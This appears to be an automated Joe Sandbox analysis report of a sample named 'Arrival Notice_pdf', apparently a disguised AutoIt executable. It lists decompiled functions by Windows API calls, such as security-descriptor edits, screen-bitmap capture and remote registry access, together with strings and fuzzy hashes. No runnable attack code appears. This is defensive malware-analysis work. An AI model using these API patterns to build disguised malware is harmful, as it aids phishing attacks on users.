Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
String ID: *.*
API String ID: 34673085-438819550
Opcode ID: ad5a09e07960d2637d7a8e72da58579ebac85e9b0bcccf71e0c871e19615282a
Instruction ID: 948107532c3ac0bcc4945f7e28240e572c60d75f6e1e813a0d03f651c5669c5d
Opcode Fuzzy Hash: ad5a09e07960d2637d7a8e72da58579ebac85e9b0bcccf71e0c871e19615282a
Instruction Fuzzy Hash: 4D81A17162430A9FCF24DF24C88496EB7E8BF89304F14482EF985C7251E770D9648F52

Function 002AEEEB Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0025B34E: GetWindowLongW.USER32(?,000000EB), ref: 0025B35F

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 002AEF3B
GetFocus.USER32 ref: 002AEF4B
GetDlgCtrlID.USER32(00000000), ref: 002AEF56
_memset.LIBCMT ref: 002AF081
GetMenuItemInfoW.USER32 ref: 002AF0AC
GetMenuItemCount.USER32(00000000), ref: 002AF0CC
GetMenuItemID.USER32(?,00000000), ref: 002AF0DF
GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 002AF113
GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 002AF15B
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 002AF193
DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 002AF1C8

Strings

0, xrefs: 002AF079

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
String ID: 0
API String ID: 1296962147-4108050209
Opcode ID: 8e8c32351790ca2c1b32c3a76159c435f4adad4ffed44dcf534fef16cc864cc6
Instruction ID: 7fc2c24f44f0bc5083f8296ae624ca6421367b339d9e4cf50c398518e5e33a98
Opcode Fuzzy Hash: 8e8c32351790ca2c1b32c3a76159c435f4adad4ffed44dcf534fef16cc864cc6
Instruction Fuzzy Hash: 7B819C70124302AFDB20CF54D984E6BBBE8FB89314F00452EF99897291DB74D825CFA2

Function 0027A867 Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0027ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0027ABD7
Part of subcall function 0027ABBB: GetLastError.KERNEL32(?,0027A69F,?,?,?), ref: 0027ABE1
Part of subcall function 0027ABBB: GetProcessHeap.KERNEL32(00000008,?,?,0027A69F,?,?,?), ref: 0027ABF0
Part of subcall function 0027ABBB: HeapAlloc.KERNEL32(00000000,?,0027A69F,?,?,?), ref: 0027ABF7
Part of subcall function 0027ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0027AC0E

Part of subcall function 0027AC56: GetProcessHeap.KERNEL32(00000008,0027A6B5,00000000,00000000,?,0027A6B5,?), ref: 0027AC62
Part of subcall function 0027AC56: HeapAlloc.KERNEL32(00000000,?,0027A6B5,?), ref: 0027AC69
Part of subcall function 0027AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0027A6B5,?), ref: 0027AC7A

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0027A8CB
_memset.LIBCMT ref: 0027A8E0
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0027A8FF
GetLengthSid.ADVAPI32(?), ref: 0027A910
GetAce.ADVAPI32(?,00000000,?), ref: 0027A94D
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0027A969
GetLengthSid.ADVAPI32(?), ref: 0027A986
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0027A995
HeapAlloc.KERNEL32(00000000), ref: 0027A99C
GetLengthSid.ADVAPI32(?,00000008,?), ref: 0027A9BD
CopySid.ADVAPI32(00000000), ref: 0027A9C4
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0027A9F5
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0027AA1B
SetUserObjectSecurity.USER32(?,00000004,?), ref: 0027AA2F

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: c7b8e90f455812436ee22472f89eef8d4ac2507df1e2ed6465bb1083a5eab25f
Instruction ID: f57c906b9853bbdd924272860908309a32cc94afbefa8b8c600e8a9f41fbbdd0
Opcode Fuzzy Hash: c7b8e90f455812436ee22472f89eef8d4ac2507df1e2ed6465bb1083a5eab25f
Instruction Fuzzy Hash: DE515B7191020AAFDF10DF94DD89EEEBBB9FF44310F048129F919A7290DB349A25CB61

Function 00299DC1 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 159windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00299E36
CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00299E42
CreateCompatibleDC.GDI32(?), ref: 00299E4E
SelectObject.GDI32(00000000,?), ref: 00299E5B
StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00299EAF
GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 00299EEB
GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00299F0F
SelectObject.GDI32(00000006,?), ref: 00299F17
DeleteObject.GDI32(?), ref: 00299F20
DeleteDC.GDI32(00000006), ref: 00299F27
ReleaseDC.USER32(00000000,?), ref: 00299F32

Strings

(, xrefs: 00299ED7

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: 7500b0e17e4b0492660a3a85cdf0e2bb70c68b4fe801b9546ad6e7179ae8ceaa
Instruction ID: 15b6477e6a354e0f8ac9194e9a135283fe42ab5e29b126284c17ad9de9487251
Opcode Fuzzy Hash: 7500b0e17e4b0492660a3a85cdf0e2bb70c68b4fe801b9546ad6e7179ae8ceaa
Instruction Fuzzy Hash: D9513B75910309AFCB14CFA8DC89EAEBBB9FF48310F14842DF999A7210D771A941CB90

Function 0028CC5C Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 155COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF), ref: 0028CCA3
LoadStringW.USER32(?,?,00000FFF,?), ref: 0028CCC5
__swprintf.LIBCMT ref: 0028CD1E
__swprintf.LIBCMT ref: 0028CD37
_wprintf.LIBCMT ref: 0028CDED
_wprintf.LIBCMT ref: 0028CE0B

Strings

^ ERROR, xrefs: 0028CD8F
"%s" (%d) : ==> %s:, xrefs: 0028CE06
Error: , xrefs: 0028CDB5
"%s" (%d) : ==> %s:%s%s, xrefs: 0028CDE8
Line %d (File "%s"):, xrefs: 0028CD18, 0028CD31

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: LoadString__swprintf_wprintf
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 2889450990-2391861430
Opcode ID: e721aba41bc86514e5f8d047b85f7e6c080714de6b2c6944352d6e2203f00499
Instruction ID: 8c3275cf0c010537fce23399653cdc1d487a2a8edf0f5ef26d974f50bc4c83bf
Opcode Fuzzy Hash: e721aba41bc86514e5f8d047b85f7e6c080714de6b2c6944352d6e2203f00499
Instruction Fuzzy Hash: 75518D31821119BACB19FBA0CD86EEEB778AF05344F204066F505721A2EB716E79DF60

Function 0028CA48 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 151COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 0028CA8F
LoadStringW.USER32(00000072,?,00000FFF,?), ref: 0028CAB0
__swprintf.LIBCMT ref: 0028CB09
__swprintf.LIBCMT ref: 0028CB22
_wprintf.LIBCMT ref: 0028CBCD
_wprintf.LIBCMT ref: 0028CBEB

Strings

"%s" (%d) : ==> %s:, xrefs: 0028CBE6
Error: , xrefs: 0028CB95
^ ERROR , xrefs: 0028CB64
"%s" (%d) : ==> %s:%s%s, xrefs: 0028CBC8
Line %d (File "%s"):, xrefs: 0028CB03, 0028CB1C

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: LoadString__swprintf_wprintf
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 2889450990-3420473620
Opcode ID: 401b3b47947aa7909f327959394e7c99ab2c3e98bf1daba3e020fc85f51731a9
Instruction ID: 52553fa3d7120b862738a9c97949cb933c4918b359450c11fc3fd9057eb54ed3
Opcode Fuzzy Hash: 401b3b47947aa7909f327959394e7c99ab2c3e98bf1daba3e020fc85f51731a9
Instruction Fuzzy Hash: EE519E31921519AACF19FBA0CD42EEEB778AF04344F204066F509720A2EB746F79DF61

Function 002A3C06 Relevance: 21.1, APIs: 1, Strings: 11, Instructions: 109COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,002A2BB5,?,?), ref: 002A3C1D

Strings

HKLM, xrefs: 002A3C81
HKEY_CLASSES_ROOT, xrefs: 002A3C96
HKEY_USERS, xrefs: 002A3D04
HKCC, xrefs: 002A3CD1
$E/, xrefs: 002A3C36
HKU, xrefs: 002A3D15
HKEY_LOCAL_MACHINE, xrefs: 002A3C6C
HKEY_CURRENT_USER, xrefs: 002A3CE2
HKEY_CURRENT_CONFIG, xrefs: 002A3CC0
HKCR, xrefs: 002A3CAB
HKCU, xrefs: 002A3CF3

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: BuffCharUpper
String ID: $E/$HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 3964851224-3778106644
Opcode ID: 44ba0da20a883d23d31002cb6b5e4d65ff3d71751dccc15999faedc9b9ad801b
Instruction ID: 29baedf72e936ad4d56734947cb9adc7e45c0f111984e5fe97d0e2e2ba4bad73
Opcode Fuzzy Hash: 44ba0da20a883d23d31002cb6b5e4d65ff3d71751dccc15999faedc9b9ad801b
Instruction Fuzzy Hash: EA41183113024A8BCF08FF14D851AEB7365AF22741F514866FC955B292EBB0EA7ACB50

Function 002855BD Relevance: 19.7, APIs: 13, Instructions: 213windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 002855D7
GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00285664
GetMenuItemCount.USER32(00301708), ref: 002856ED
DeleteMenu.USER32(00301708,00000005,00000000,000000F5,?,?), ref: 0028577D
DeleteMenu.USER32(00301708,00000004,00000000), ref: 00285785
DeleteMenu.USER32(00301708,00000006,00000000), ref: 0028578D
DeleteMenu.USER32(00301708,00000003,00000000), ref: 00285795
GetMenuItemCount.USER32(00301708), ref: 0028579D
SetMenuItemInfoW.USER32(00301708,00000004,00000000,00000030), ref: 002857D3
GetCursorPos.USER32(?), ref: 002857DD
SetForegroundWindow.USER32(00000000), ref: 002857E6
TrackPopupMenuEx.USER32(00301708,00000000,?,00000000,00000000,00000000), ref: 002857F9
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00285805

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
String ID:
API String ID: 3993528054-0
Opcode ID: 86a3ca053df60870016bb88dce6e913a8ef83a73a594eed3e231db0b13345341
Instruction ID: f43faf51aee6d06d546722f12cfc675a246af8a414bf327166b3c99243970cfe
Opcode Fuzzy Hash: 86a3ca053df60870016bb88dce6e913a8ef83a73a594eed3e231db0b13345341
Instruction Fuzzy Hash: 14712778662A26BFEB21AF14DC49FAABF69FF00364F644216F5186A1D0D7B05C70CB50

Function 0027A14D Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 127registryshareCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0027A1DC
WNetAddConnection2W.MPR(?,?,?,00000000), ref: 0027A211
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0027A22D
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 0027A249
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 0027A273
CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 0027A29B
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0027A2A6
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0027A2AB

Strings

\CLSID, xrefs: 0027A193
SOFTWARE\Classes\, xrefs: 0027A17D
\IPC$, xrefs: 0027A1F3

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 1687751970-22481851
Opcode ID: 1007e0787dde3a1277debfdbd61777fc905617a230836d1e80948bc05738079b
Instruction ID: 561bef494ac56f57730c395ff3ef9f3b935ba5c27782bb9d569d17fc5b2d0045
Opcode Fuzzy Hash: 1007e0787dde3a1277debfdbd61777fc905617a230836d1e80948bc05738079b
Instruction Fuzzy Hash: BC41E676C20229ABDB15EFA4DC85DEEB7B8FF04750F004169E906A3161EB709E29CF50

Function 002867E9 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 107windowCOMMON

Download Yara Rule

APIs

__swprintf.LIBCMT ref: 002867FD
__swprintf.LIBCMT ref: 0028680A

Part of subcall function 0026172B: __woutput_l.LIBCMT ref: 00261784

FindResourceW.KERNEL32(?,?,0000000E), ref: 00286834
LoadResource.KERNEL32(?,00000000), ref: 00286840
LockResource.KERNEL32(00000000), ref: 0028684D
FindResourceW.KERNEL32(?,?,00000003), ref: 0028686D
LoadResource.KERNEL32(?,00000000), ref: 0028687F
SizeofResource.KERNEL32(?,00000000), ref: 0028688E
LockResource.KERNEL32(?), ref: 0028689A
CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 002868F9

Strings

5/, xrefs: 002867F6

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
String ID: 5/
API String ID: 1433390588-3989924723
Opcode ID: 6ae64cb893f35cdad42349f565c7b62245902e40faafe160a542131a21bfca4e
Instruction ID: 17b4e3e26eef0811fa63b012b428fb1e73a5bc2d596c45b98973fe9e766750bb
Opcode Fuzzy Hash: 6ae64cb893f35cdad42349f565c7b62245902e40faafe160a542131a21bfca4e
Instruction Fuzzy Hash: 2531B27591221AABDB11AFA0EC5CEBFBBACEF08340F008425F905D2191E730D965DB61

Function 002825B5 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 74windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,002B36F4,00000010,?,Bad directive syntax error,002DDC00,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 002825D6
LoadStringW.USER32(00000000,?,002B36F4,00000010), ref: 002825DD
_wprintf.LIBCMT ref: 00282610
__swprintf.LIBCMT ref: 00282632
MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 002826A1

Strings

Error: , xrefs: 0028266F
Line %d:, xrefs: 0028262C
., xrefs: 00282687
Line %d (File "%s"):, xrefs: 00282647
%s (%d) : ==> %s.: %s %s, xrefs: 0028260B

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: HandleLoadMessageModuleString__swprintf_wprintf
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 1080873982-4153970271
Opcode ID: 2b8b1ec71b638a6248071ff67739fef4bc74892c7814260699d86a3aa6476b7c
Instruction ID: f9b526bb85f37bec32bfb766064a6f103fc086ffcb81853b1cf94c457baddba9
Opcode Fuzzy Hash: 2b8b1ec71b638a6248071ff67739fef4bc74892c7814260699d86a3aa6476b7c
Instruction Fuzzy Hash: 8921303192022EABCF15FB90DC4AEEE7739BF19344F044465F505660A2EB71AA78DF50

Function 00287AD9 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 73COMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00287B42
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00287B58
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00287B69
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00287B7B
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00287B8C

Strings

play PlayMe wait, xrefs: 00287B76
alias PlayMe, xrefs: 00287B1B
play PlayMe, xrefs: 00287B87
close PlayMe, xrefs: 00287B53, 00287B80
open , xrefs: 00287AF1
status PlayMe mode, xrefs: 00287B3D

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: SendString
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 890592661-1007645807
Opcode ID: 54fa0cbea4f0973b3b87fec8df6d4baa6eb098a0a087c870321f3aade2c20c7d
Instruction ID: 39bf30d9477e17518401524588bd3b82d3cbe213df8635e382bccaeae5ad86af
Opcode Fuzzy Hash: 54fa0cbea4f0973b3b87fec8df6d4baa6eb098a0a087c870321f3aade2c20c7d
Instruction Fuzzy Hash: 411104A467126D79D724F765CC4ADFFFA7CEB92B40F100429B415A20D1DAB04A69CAB0

Function 0028778F Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 00287794

Part of subcall function 0025DC38: timeGetTime.WINMM(?,75C0B400,002B58AB), ref: 0025DC3C

Sleep.KERNEL32(0000000A), ref: 002877C0
EnumThreadWindows.USER32(?,Function_00047744,00000000), ref: 002877E4
FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00287806
SetActiveWindow.USER32 ref: 00287825
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00287833
SendMessageW.USER32(00000010,00000000,00000000), ref: 00287852
Sleep.KERNEL32(000000FA), ref: 0028785D
IsWindow.USER32 ref: 00287869
EndDialog.USER32(00000000), ref: 0028787A

Strings

BUTTON, xrefs: 002877F8

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: 8252434e96e66f56051082026dee3e1bcd8bde7cc5a3616c5f7f483e6be783ec
Instruction ID: 20c453fbf1b77f619c1508228a77425e39fa2cc385f6e5432a4089ea6e2833a7
Opcode Fuzzy Hash: 8252434e96e66f56051082026dee3e1bcd8bde7cc5a3616c5f7f483e6be783ec
Instruction Fuzzy Hash: 5E215E78226205AFE7066F20FCADF667F2DFB04349F240075F559821A2CB719C24DB24

Function 002902EE Relevance: 18.3, APIs: 12, Instructions: 282comCOMMON

Download Yara Rule

APIs

Part of subcall function 0024936C: __swprintf.LIBCMT ref: 002493AB
Part of subcall function 0024936C: __itow.LIBCMT ref: 002493DF

CoInitialize.OLE32(00000000), ref: 0029034B
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 002903DE
SHGetDesktopFolder.SHELL32(?), ref: 002903F2
CoCreateInstance.OLE32(002CDA8C,00000000,00000001,002F3CF8,?), ref: 0029043E
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 002904AD
CoTaskMemFree.OLE32(?,?), ref: 00290505
_memset.LIBCMT ref: 00290542
SHBrowseForFolderW.SHELL32(?), ref: 0029057E
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 002905A1
CoTaskMemFree.OLE32(00000000), ref: 002905A8
CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 002905DF
CoUninitialize.OLE32(00000001,00000000), ref: 002905E1

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

